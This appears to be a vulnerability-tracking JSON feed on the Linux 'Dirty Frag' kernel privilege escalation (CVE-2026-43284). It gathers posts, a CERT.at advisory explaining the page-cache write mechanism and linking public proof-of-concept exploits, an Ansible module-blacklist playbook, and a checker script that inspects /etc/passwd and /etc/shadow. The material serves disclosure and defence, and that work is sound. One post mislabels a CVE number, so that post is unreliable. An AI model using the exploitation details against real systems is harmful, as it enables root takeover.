{"vulnerability": "cve-2026-43284", "sightings": [{"uuid": "4427c4be-3dd8-49cb-b69f-7c94919e2be0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://infosec.exchange/users/wdormann/statuses/116539044705700152", "content": "And just to clarify about \"Dirty Frag\" vs. \"Copy Fail 2\":\nDirty Frag is TWO vulnerabilities:\n\nThe xfrm-ESP Page-Cache Write vulnerability has been assigned CVE-2026-43284 and patched in mainline at f4c50a4034e6.\nThe RxRPC Page-Cache Write vulnerability has been reserved as CVE-2026-43500 for tracking; no patch exists in any tree yet.\nCopy Fail 2 is a \"clean room\" rediscovery/exploitation of f4c50a4034e6\nSince Copy Fail 2 was published to GitHub 1 hour earlier than Dirty Frag was published.  The Dirty Frag writeup specifies that the embargo was broken, and as a result TWO vulnerabilities were disclosed.\nPersonally, I think that if you publish a patch for a vulnerability, and then you begin an embargo a week after it was published, that doesn't really count as an \"embargo\"?  \ud83e\udd37\u200d\u2642\ufe0f\nFun stuff...", "creation_timestamp": "2026-05-08T12:51:43.619832Z"}, {"uuid": "a789b2bd-0fac-4065-a29f-f6af98bdbc48", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://gist.github.com/klaver/ae3745e2b8551740dc907703a05b1949", "content": "---\n- name: \"Mitigate DirtyFrag (CVE-2026-43284)\"\n  hosts: \"all\"\n  become: true\n  gather_facts: false\n  tasks:\n\n    - name: \"Prevent esp4 kernel module from being loaded\"\n      ansible.builtin.lineinfile:\n        path: \"/etc/modprobe.d/mitigate-dirtyfrag.conf\"\n        line: \"install esp4 /bin/false\"\n        state: \"present\"\n        create: true\n        mode: \"0644\"\n        owner: \"root\"\n        group: \"root\"\n\n    - name: \"Unload esp4 kernel module\"\n      community.general.modprobe:\n        name: \"esp4\"\n        state: \"absent\"\n        persistent: \"absent\"\n      notify: \"Reboot if loaded module found\"\n\n    - name: \"Prevent esp6 kernel module from being loaded\"\n      ansible.builtin.lineinfile:\n        path: \"/etc/modprobe.d/mitigate-dirtyfrag.conf\"\n        line: \"install esp6 /bin/false\"\n        state: \"present\"\n        create: true\n        mode: \"0644\"\n        owner: \"root\"\n        group: \"root\"\n\n    - name: \"Unload esp6 kernel module\"\n      community.general.modprobe:\n        name: \"esp6\"\n        state: \"absent\"\n        persistent: \"absent\"\n      notify: \"Reboot if loaded module found\"\n\n    - name: \"Prevent rxrpc kernel module from being loaded\"\n      ansible.builtin.lineinfile:\n        path: \"/etc/modprobe.d/mitigate-dirtyfrag.conf\"\n        line: \"install rxrpc /bin/false\"\n        state: \"present\"\n        create: true\n        mode: \"0644\"\n        owner: \"root\"\n        group: \"root\"\n\n    - name: \"Unload rxrpc kernel module\"\n      community.general.modprobe:\n        name: \"rxrpc\"\n        state: \"absent\"\n        persistent: \"absent\"\n      notify: \"Reboot if loaded module found\"\n\n  handlers:\n    - name: \"Reboot if loaded module found\"\n      ansible.builtin.reboot:\n", "creation_timestamp": "2026-05-08T07:56:06.000000Z"}, {"uuid": "60f54618-4939-47cb-988f-2050efa8ede4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3mldgrdsyig2e", "content": "CVE-2026-43284 - xfrm: esp: avoid in-place decrypt on shared skb frags\nCVE ID : CVE-2026-43284\n \n Published : May 8, 2026, 7:21 a.m. | 1\u00a0hour, 4\u00a0minutes ago\n \n Description : In the Linux kernel, the following vulnerability has been resolved:\n\nxfrm: esp: avoid in-place decrypt ...", "creation_timestamp": "2026-05-08T09:40:07.538566Z"}, {"uuid": "67c4aba0-11bf-4f9b-8258-1ad6a7c5c436", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://infosec.exchange/users/decio/statuses/116538375077982531", "content": "Les deux vuln\u00e9rabilit\u00e9s composant #DirtyFrag ont re\u00e7u leurs num\u00e9ros CVE :\n\ud83d\udd34 CVE-2026-43284 \u2014 xfrm-ESP Page-Cache Write (patch\u00e9 en mainline : f4c50a4034e6)\ud83d\udfe1 CVE-2026-43500 \u2014 RxRPC Page-Cache Write\nSi ce n'est pas encore fait, la mitigation reste de blacklister esp4, esp6 et rxrpc.\ud83d\udc47 https://vulnerability.circl.lu/vuln/CVE-2026-43284", "creation_timestamp": "2026-05-08T10:01:23.808611Z"}, {"uuid": "84d343bb-7488-47b0-8d09-59c5f3a6e1c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://infosec.exchange/users/decio/statuses/116538377568822089", "content": "[related]chez AlmaLinux\n\"Dirty Frag (CVE-2026-43284) vulnerability fix is ready for testing\"\ud83d\udc47 https://almalinux.org/blog/2026-05-07-dirty-frag/", "creation_timestamp": "2026-05-08T10:02:02.131003Z"}, {"uuid": "4156aeff-59d2-4029-9ed6-8524f90a9a0a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/dju.eurosky.social/post/3mldbvjhscc2c", "content": "petite erreur de frappe\nil s'agit du CVE-2026-43284\nwww.openwall.com/lists/oss-se...", "creation_timestamp": "2026-05-08T08:12:58.952374Z"}, {"uuid": "38500b61-703f-4a62-adc9-b2d89f2e4832", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/dju.eurosky.social/post/3mldbu6eqg22c", "content": "petite erreur de frappe\nil s'agit du CVE-2026-43284 ;)", "creation_timestamp": "2026-05-08T08:12:14.078734Z"}, {"uuid": "52601240-0e6c-4c0c-8e7b-a20fc4becc3f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/dju.eurosky.social/post/3mldcaiuoac2c", "content": "la faille #DirtyFrag a d\u00e9sormais son CVE:\nCVE-2026-43284", "creation_timestamp": "2026-05-08T08:19:07.624163Z"}, {"uuid": "3b3256ff-6a9f-4548-a010-6c0cb280779d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://infosec.exchange/users/decio/statuses/116538432803616915", "content": "Nouveaux kernels stables : 7.0.5 / 6.18.28 / 6.12.87 / 6.6.138\nIls embarquent un fix partiel pour #DirtyFrag (CVE-2026-43284) et Copy Fail 2.\nPartiel, car Greg Kroah-Hartman a confirm\u00e9 qu'un second patch est encore en d\u00e9veloppement et n'a pas encore \u00e9t\u00e9 merg\u00e9. \nLa mitigation par blacklist des modules reste donc recommand\u00e9e en attendant.\ud83d\udc47 https://lwn.net/Articles/1071775/\n#Linux #Kernel #CyberVeille", "creation_timestamp": "2026-05-08T10:16:04.837440Z"}, {"uuid": "c0c858a9-ee7d-488f-a0db-bb5653540f25", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/wdormann.infosec.exchange.ap.brid.gy/post/3mldrhyvw6se2", "content": "And just to clarify about \"Dirty Frag\" vs. \"Copy Fail 2\":\n\n**Dirty Frag** is **TWO** vulnerabilities:\n\n  1. The xfrm-ESP Page-Cache Write vulnerability has been assigned CVE-2026-43284 and patched in mainline at f4c50a4034e6.\n  2. The RxRPC Page-Cache Write [\u2026] \n\n[Original post on infosec.exchange]", "creation_timestamp": "2026-05-08T12:51:53.744413Z"}, {"uuid": "0810d7c6-63e3-45a8-abbe-5b5298a3b3df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/aoetk.bsky.social/post/3mldllohhqs2s", "content": "\u307e\u305f\u30ab\u30fc\u30cd\u30eb\u8106\u5f31\u6027\u3067\u3053\u3093\u306a\u306e\u304c\u51fa\u3066\u304d\u305f\u3093\u304b\u30fc\u3044\n\n/ Linux Kernel\u306eLPE(Local Privilege Escalation)\u8106\u5f31\u6027(Dirty Frag: CVE-2026-43284, CVE-2026-43500) security.sios.jp/vulnerabilit...", "creation_timestamp": "2026-05-08T11:06:29.971113Z"}, {"uuid": "2a478491-bfcf-42f1-92ff-327718898116", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://www.cert.at/de/warnungen/2026/5/linux-lpe-dirty-frag-copy-fail-2", "content": "08. Mai 2026\n\nBeschreibung\n\nAm 7. Mai 2026 wurden zwei neue Schwachstellen im Linux-Kernel öffentlich gemacht, die unter den Namen „Dirty Frag“ und „Copy Fail 2: Electric Boogaloo“ bekannt sind. Beide Schwachstellen ermöglichen lokalen, nicht privilegierten Benutzer:innen eine Eskalation auf root. Sie liegen in den In-Place-Entschlüsselungspfaden der Kernel-Module esp4, esp6 (IPsec/ESP) sowie rxrpc und nutzen Page-Cache-Writeprimitives aus, indem über splice(2), sendfile(2) bzw. MSG_SPLICE_PAGES angehängte, nicht kernelseitig privat gehaltene Seiten direkt überschrieben werden.\n\nFunktionsfähige Proof-of-Concept-Exploits (PoCs) sind öffentlich verfügbar und ermöglichen die Eskalation auf root in einem einzigen Aufruf.\n\nCVE-Nummer(n): CVE-2026-43284 (Dirty Frag), N/A (Copy Fail 2)\n\nCVSS Base Score: noch nicht vergeben\n\nAuswirkungen\n\nLokale, nicht privilegierte Angreifer:innen können durch Ausnutzung der Schwachstellen beliebige Inhalte im Page-Cache des Kernels überschreiben und sich dadurch root-Rechte auf dem betroffenen System verschaffen. Es handelt sich um deterministische Logikfehler ohne Race-Condition; bei einem Fehlschlag tritt keine Kernel-Panik auf, die Erfolgswahrscheinlichkeit wird als hoch beschrieben.\n\nDer xfrm-ESP-Pfad setzt die Möglichkeit zur Erstellung von User-Namespaces voraus. Der RxRPC-Pfad benötigt diese Voraussetzung nicht, ist jedoch nur auf Distributionen ausnutzbar, in denen das Modul rxrpc.ko verfügbar bzw. geladen ist. Durch Verkettung beider Pfade lässt sich auf den meisten gängigen Distributionen root erlangen.\n\nBestehende Gegenmaßnahmen gegen „Copy Fail“ (CVE-2026-31431), insbesondere das Sperren des Moduls algif_aead, schützen NICHT gegen „Dirty Frag“ oder „Copy Fail 2“.\n\nBetroffene Systeme\n\nBetroffen sind die meisten aktuellen Linux-Distributionen mit aktiviertem Page-Cache-Pfad in esp4/esp6 bzw. rxrpc. Die zugrundeliegenden Code-Stellen existieren laut Hersteller- und Forscher:innen-Angaben seit Kernel-Commit cac2661c53f3 (xfrm-ESP, Januar 2017) bzw. 2dc334f1a63a (RxRPC, Juni 2023). Die folgende Aufstellung ist daher nicht abschließend; sie führt nur diejenigen Distributionen auf, deren Hersteller die Betroffenheit bisher öffentlich bestätigt haben oder für die der Forscher die Ausnutzung explizit getestet hat:\n\n\n\nUbuntu 24.04 (vom Forscher getestet auf Kernel 6.17)\n\nRed Hat Enterprise Linux 10.1 (vom Forscher getestet); Red Hat hat in RHSB-2026-003 die Betroffenheit zudem für Red Hat OpenShift Container Platform 4 bestätigt\n\nCentOS Stream 10\n\nAlmaLinux 8, 9 und 10 (gepatcht in kernel-4.18.0-553.123.2.el8_10, kernel-5.14.0-611.54.3.el9_7 bzw. kernel-6.12.0-124.55.2.el10_1 und neuer)\n\nFedora 44\n\nopenSUSE Tumbleweed\n\nCloudLinux 7h, 8, 9 und 10 (CloudLinux 7 wird vom Hersteller noch untersucht)\n\nBlueOnyx 5210R, 5211R, 5212R\n\n\nAmazon Linux untersucht laut Sicherheitsbulletin 2026-027-AWS aktuell den genauen Umfang der betroffenen Versionen.\n\nDistributionen, die unprivilegierte User-Namespaces standardmäßig blockieren (z. B. Ubuntu via AppArmor in bestimmten Konfigurationen), sind über den xfrm-ESP-Pfad nicht angreifbar, bleiben aber über den RxRPC-Pfad anfällig, sofern das Modul vorhanden ist.\n\nAbhilfe\n\nZum Zeitpunkt der Veröffentlichung dieser Warnung liegen für die meisten Distributionen noch keine vollständig gepatchten Kernel vor. Der Upstream-Fix für den ESP-Pfad wurde am 7. Mai 2026 in den netdev-Tree aufgenommen (Commit f4c50a4034e62ab75f1d5cdd191dd5f9c77fdff4); der RxRPC-Fix ist noch nicht gemergt. Einzelne Distributionen (u. a. AlmaLinux, CloudLinux) haben gepatchte Kernel bzw. KernelCare-Livepatches in Vorbereitung oder bereits in Test bzw. Auslieferung.\n\nCERT.at empfiehlt, die folgenden Maßnahmen umzusetzen:\n\n\n\nSicherheitsaktualisierungen der jeweiligen Distribution einspielen, sobald diese verfügbar sind, und das System neu starten.\n\nBis zur Verfügbarkeit gepatchter Kernel die betroffenen Kernel-Module sperren, sofern sie nicht produktiv benötigt werden. Die Module esp4 und esp6 werden für IPsec-Tunnel (z. B. strongSwan, Libreswan) verwendet; rxrpc wird nahezu ausschließlich von AFS-Clients genutzt. Auf Systemen, die diese Funktionen nicht einsetzen, kann das Sperren der Module ohne Funktionsverlust erfolgen, beispielsweise durch Eintragen entsprechender Regeln in /etc/modprobe.d/ und Entladen aktuell geladener Module.\n\nAuf Hosts, die IPsec-Tunnel terminieren oder weiterleiten, dürfen die Module esp4/esp6 nicht gesperrt werden. In diesem Fall ist die Installation eines gepatchten Kernels bzw. eines Livepatches abzuwarten.\n\n\nMehrschichtige Mitigationen (Modul-Blacklist über modprobe.d sowie zusätzlich modprobe.blacklist=... als Kernel-Parameter) erhöhen die Wirksamkeit, insbesondere gegen ein automatisches Nachladen über Netlink aus User-Namespaces heraus.\n\nHinweis\n\nGenerell empfiehlt CERT.at, sämtliche Software aktuell zu halten und dabei insbesondere auf automatische Updates zu setzen. Regelmäßige Neustarts stellen sicher, dass diese auch zeitnah aktiviert werden.\n\n\n\nInformationsquelle(n):\n\nDirty Frag - Disclosure und PoC durch Hyunwoo Kim (Englisch)https://github.com/V4bel/dirtyfrag\n\nGreg Kroah-Hartman zur CVE-Vergabe auf der oss-security-Mailingliste (Englisch)https://seclists.org/oss-sec/2026/q2/441\n\nCopy Fail 2: Electric Boogaloo - Write-up und PoC (Englisch)https://afflicted.sh/blog/posts/copy-fail-2.html\n\nAlmaLinux: Dirty Frag vulnerability fix is ready for testing (Englisch)https://almalinux.org/blog/2026-05-07-dirty-frag/\n\nCloudLinux: Dirty Frag - Mitigation and Kernel Update (Englisch)https://blog.cloudlinux.com/dirty-frag-mitigation-and-kernel-update\n\nRed Hat: How to mitigate the „Dirty Frag“ vulnerability in OpenShift 4 (RHSB-2026-003) (Englisch)https://access.redhat.com/solutions/7142250\n\nRed Hat Security Bulletin RHSB-2026-003 (Englisch)https://access.redhat.com/security/vulnerabilities/RHSB-2026-003\n\nAmazon: Dirty Frag and other issues in Amazon Linux kernels (Englisch)https://aws.amazon.com/security/security-bulletins/rss/2026-027-aws/\n\nBlueOnyx: Security Advisory: Dirty Frag & Copy Fail 2 - Two New Linux LCE Vulnerabilities (Englisch)https://www.blueonyx.it/news/sec-adv-dirtyfrag-copyfail2.html\n\nUpstream-Fix für den ESP-Pfad (netdev/net.git) (Englisch)https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/commit/?id=f4c50a4034e62ab75f1d5cdd191dd5f9c77fdff4", "creation_timestamp": "2026-05-08T09:29:25.000000Z"}, {"uuid": "e3f410b3-2611-4b70-8c4b-0d53c2ff7140", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/aoetk.fedibird.com.ap.brid.gy/post/3mldlq5pm74r2", "content": "\u307e\u305f\u30ab\u30fc\u30cd\u30eb\u8106\u5f31\u6027\u3067\u3053\u3093\u306a\u306e\u304c\u51fa\u3066\u304d\u305f\u3093\u304b\u30fc\u3044\n\n/ Linux Kernel\u306eLPE(Local Privilege Escalation)\u8106\u5f31\u6027(Dirty Frag: CVE-2026-43284, CVE-2026-43500) - SIOS SECURITY BLOG https://security.sios.jp/vulnerability/kernel-security-vulnerability-20260508/", "creation_timestamp": "2026-05-08T11:13:12.235863Z"}, {"uuid": "5de3f4dc-be1c-47fb-91a7-de89d9706a8c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://fosstodon.org/users/alpinelinux/statuses/116538695628774725", "content": "2 new vulnerabilities similar to coyfail:\n- CVE-2026-31431 (Dirty Frag)- CVE-2026-43284\nhttps://github.com/V4bel/dirtyfrag\nWe're waiting for a release containing the last one before pushing new kernels to aports.\nhttps://github.com/V4bel/dirtyfrag#cleanup mentions a mitigation in the meantime.", "creation_timestamp": "2026-05-08T11:22:57.462256Z"}, {"uuid": "287a1372-f393-4e12-b3f1-06d6e58958da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/soara.bsky.social/post/3mldmlppj6c2l", "content": "\u4eca\u65e5\u51fa\u305f linux kernel \u306e\u8106\u5f31\u6027 \"Dirty Frag\" CVE-2026-43284 \u306b\u5bfe\u5fdc\u3057\u305f kernel (\u30d0\u30cb\u30e9\u30ab\u30fc\u30cd\u30eb)\u304c\u5404\u30d0\u30fc\u30b8\u30e7\u30f3\u3067\u51fa\u305f\u6a21\u69d8\n\n* 7.0.5\n* 6.18.28\n* 6.12.87\n* 6.6.138\n* 6.1.171\n* 5.15.205\n* 5.10.255", "creation_timestamp": "2026-05-08T11:24:21.776149Z"}, {"uuid": "6b67825a-dc2d-4543-a253-3e059d70c686", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://gist.github.com/xc78xsgzsd-droid/7bb632be2e3e341b4e8b4cc79deac739", "content": "#!/bin/sh\n# ============================================================\n# DirtyFrag Vulnerability Checker\n# CVE-2026-43284 (xfrm/ESP) + CVE-2026-43500 (rxrpc)\n# Disclosed: 2026-05-07 | No patch available yet\n# ============================================================\n\nRED='\\033[0;31m'; YEL='\\033[1;33m'; GRN='\\033[0;32m'\nBLD='\\033[1m'; RST='\\033[0m'\n\nok()   { printf \"${GRN}[OK]${RST}     %s\\n\" \"$1\"; }\nwarn() { printf \"${YEL}[WARN]${RST}   %s\\n\" \"$1\"; }\nvuln() { printf \"${RED}[VULN]${RST}   %s\\n\" \"$1\"; }\ninfo() { printf \"         %s\\n\" \"$1\"; }\n\necho\nprintf \"${BLD}=== DirtyFrag Vulnerability Check ===${RST}\\n\"\nprintf \"    CVE-2026-43284 (ESP/xfrm) + CVE-2026-43500 (rxrpc)\\n\"\nprintf \"    Kernel: %s\\n\\n\" \"$(uname -r)\"\n\nVULN_COUNT=0\n\n# \u2500\u2500 1. Mitigation already in place? \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\nprintf \"${BLD}[1] Modprobe blacklist (/etc/modprobe.d/dirtyfrag.conf)${RST}\\n\"\nif [ -f /etc/modprobe.d/dirtyfrag.conf ] || \\\n   grep -rq 'install esp4 /bin/false' /etc/modprobe.d/ 2>/dev/null; then\n    ok \"Blacklist found \u2013 modules blocked from loading\"\n    MITIGATED=1\nelse\n    warn \"No blacklist found\"\n    MITIGATED=0\nfi\necho\n\n# \u2500\u2500 2. Vulnerable modules currently loaded? \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\nprintf \"${BLD}[2] Loaded kernel modules (esp4 / esp6 / rxrpc)${RST}\\n\"\nfor MOD in esp4 esp6 rxrpc; do\n    if lsmod 2>/dev/null | grep -q \"^${MOD} \"; then\n        vuln \"Module '${MOD}' is currently LOADED\"\n        VULN_COUNT=$((VULN_COUNT + 1))\n    else\n        ok \"Module '${MOD}' not loaded\"\n    fi\ndone\necho\n\n# \u2500\u2500 3. Modules available on disk? \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\nprintf \"${BLD}[3] Module files available on disk${RST}\\n\"\nKVER=$(uname -r)\nfor MOD in esp4 esp6 rxrpc; do\n    FOUND=$(find /lib/modules/${KVER} -name \"${MOD}.ko\" -o -name \"${MOD}.ko.xz\" \\\n                                     -o -name \"${MOD}.ko.zst\" 2>/dev/null | head -1)\n    if [ -n \"$FOUND\" ]; then\n        if [ \"$MITIGATED\" -eq 1 ]; then\n            warn \"Module '${MOD}' exists on disk (but loading is blocked)\"\n            info \"\u2192 $FOUND\"\n        else\n            vuln \"Module '${MOD}' exists and CAN be auto-loaded\"\n            info \"\u2192 $FOUND\"\n            VULN_COUNT=$((VULN_COUNT + 1))\n        fi\n    else\n        ok \"Module '${MOD}' not found on disk\"\n    fi\ndone\necho\n\n# \u2500\u2500 4. User namespace creation (xfrm/ESP exploit path) \u2500\u2500\u2500\u2500\nprintf \"${BLD}[4] Unprivileged user namespaces (CVE-2026-43284 path)${RST}\\n\"\nUSERNS=$(cat /proc/sys/user/max_user_namespaces 2>/dev/null)\nif [ \"$USERNS\" = \"0\" ]; then\n    ok \"user.max_user_namespaces = 0 (xfrm/ESP exploit path blocked)\"\nelse\n    USERNS=${USERNS:-\"unknown\"}\n    warn \"user.max_user_namespaces = ${USERNS} (ESP exploit path reachable)\"\n    info \"\u2192 Ubuntu: check AppArmor profile for namespace restriction\"\nfi\n\n# AppArmor namespace restriction (Ubuntu)\nif [ -f /sys/kernel/security/apparmor/profiles ]; then\n    if grep -q 'unprivileged_userns' /sys/kernel/security/apparmor/profiles 2>/dev/null || \\\n       [ -f /etc/apparmor.d/tunables/userns ]; then\n        ok \"AppArmor namespace restriction detected (Ubuntu-style mitigation)\"\n    fi\nfi\necho\n\n# \u2500\u2500 5. rxrpc-specific check \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\nprintf \"${BLD}[5] rxrpc path (CVE-2026-43500 \u2013 no namespace needed)${RST}\\n\"\nif lsmod 2>/dev/null | grep -q '^rxrpc '; then\n    vuln \"rxrpc is loaded \u2013 exploit path requires NO namespace privilege\"\n    VULN_COUNT=$((VULN_COUNT + 1))\nelif find /lib/modules/${KVER} -name 'rxrpc.ko*' 2>/dev/null | grep -q .; then\n    if [ \"$MITIGATED\" -eq 1 ]; then\n        ok \"rxrpc available but loading is blacklisted\"\n    else\n        vuln \"rxrpc module present and loadable (no namespace needed to exploit)\"\n        VULN_COUNT=$((VULN_COUNT + 1))\n    fi\nelse\n    ok \"rxrpc module not present on this system\"\nfi\necho\n\n# \u2500\u2500 6. Page cache integrity hint \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\nprintf \"${BLD}[6] Page cache integrity check (exploit IOC)${RST}\\n\"\nPASSWD_SIZE=$(stat -c%s /etc/passwd 2>/dev/null)\nSHADOW_SIZE=$(stat -c%s /etc/shadow 2>/dev/null)\nif [ -n \"$PASSWD_SIZE\" ] && [ \"$PASSWD_SIZE\" -lt 50 ]; then\n    vuln \"/etc/passwd suspiciously small (${PASSWD_SIZE} bytes) \u2013 possible tampering!\"\n    VULN_COUNT=$((VULN_COUNT + 1))\nelse\n    ok \"/etc/passwd size appears normal (${PASSWD_SIZE} bytes)\"\nfi\n\n# Check for unexpected root entries (new UID 0 lines)\nROOT_ENTRIES=$(grep -c ':0:' /etc/passwd 2>/dev/null)\nif [ \"$ROOT_ENTRIES\" -gt 2 ]; then\n    vuln \"Multiple UID-0 entries in /etc/passwd (${ROOT_ENTRIES}) \u2013 check for backdoor!\"\n    VULN_COUNT=$((VULN_COUNT + 1))\nelse\n    ok \"No unexpected UID-0 entries in /etc/passwd\"\nfi\necho\n\n# \u2500\u2500 Summary \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\nprintf \"${BLD}=== Summary ===${RST}\\n\"\nKERNEL_YEAR=$(uname -r | grep -oE '^[0-9]+' )\nif [ \"$KERNEL_YEAR\" -ge 4 ] 2>/dev/null; then\n    info \"Kernel $(uname -r) is in the affected range (since Jan 2017)\"\nelse\n    info \"Kernel $(uname -r) \u2013 age unclear, manual review recommended\"\nfi\n\nif [ \"$MITIGATED\" -eq 1 ] && [ \"$VULN_COUNT\" -eq 0 ]; then\n    printf \"\\n${GRN}${BLD}[RESULT] Mitigation applied \u2013 system appears protected${RST}\\n\"\n    info \"\u2192 Revert /etc/modprobe.d/dirtyfrag.conf once a patched kernel is installed\"\nelif [ \"$VULN_COUNT\" -eq 0 ]; then\n    printf \"\\n${YEL}${BLD}[RESULT] No active modules loaded, but no blacklist in place${RST}\\n\"\n    info \"\u2192 Modules can still be auto-loaded. Apply mitigation to be safe.\"\nelse\n    printf \"\\n${RED}${BLD}[RESULT] SYSTEM LIKELY VULNERABLE (${VULN_COUNT} issue(s) found)${RST}\\n\"\n    info \"\u2192 Apply mitigation immediately (unless you use IPsec/kAFS):\"\n    printf \"\\n\"\n    printf '    sudo sh -c \"printf '\"'\"'install esp4 /bin/false\\ninstall esp6 /bin/false\\ninstall rxrpc /bin/false\\n'\"'\"' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; true\"\\n'\n    printf \"\\n\"\n    info \"\u2192 Optionally drop page cache afterwards:\"\n    info \"  sudo sh -c 'echo 3 > /proc/sys/vm/drop_caches'\"\nfi\necho\n", "creation_timestamp": "2026-05-08T12:08:27.000000Z"}, {"uuid": "e9ba71ef-2538-4333-bf26-c82005c6126a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/dougburks.bsky.social/post/3mldpbqyaqc2k", "content": "OhMyDebn 3.7.1 now available with mitigation for Dirty Frag local privilege escalation CVE-2026-43284\n\nOhMyDebn is a debonair Linux desktop for power users. It gives you the stability of the Debian distro, the ease of use of the Cinnamon desktop, and the power of AI, containers, and virtualization.", "creation_timestamp": "2026-05-08T12:12:32.311177Z"}, {"uuid": "b21459f8-7500-48f1-820b-fe5748143e7b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/unraid.net/post/3mlewtdz2522l", "content": "\ud83d\udea8 Unraid OS 7.2.6 is now available.   \n\nThis is an important security release that upgrades the Linux kernel to address the \"Dirty Frag\" local privilege escalation vulnerability (CVE-2026-43284 & CVE-2026-43500).  \n\nAll users should update their systems immediately to stay protected. \ud83d\udee1\ufe0f", "creation_timestamp": "2026-05-09T00:00:14.553919Z"}, {"uuid": "c6142cdc-5fa1-4a02-bdc6-ace77a52217c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/slackers.it/post/3mleww4snfr22", "content": "3/11\n\naway you may blacklist or remove the kernel modules esp4.ko and esp6.ko\n  (CVE-2026-43284) and rxrpc.ko (CVE-2026-43500).\n  Also remove the modules from the kernel if they have been loaded:\n    rmmod esp4 esp6 rxrpc\n  And, drop the file caches in case in-memory program copies", "creation_timestamp": "2026-05-09T00:01:47.341898Z"}, {"uuid": "9c6085dd-89c2-48e6-9792-778d9d4007a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": 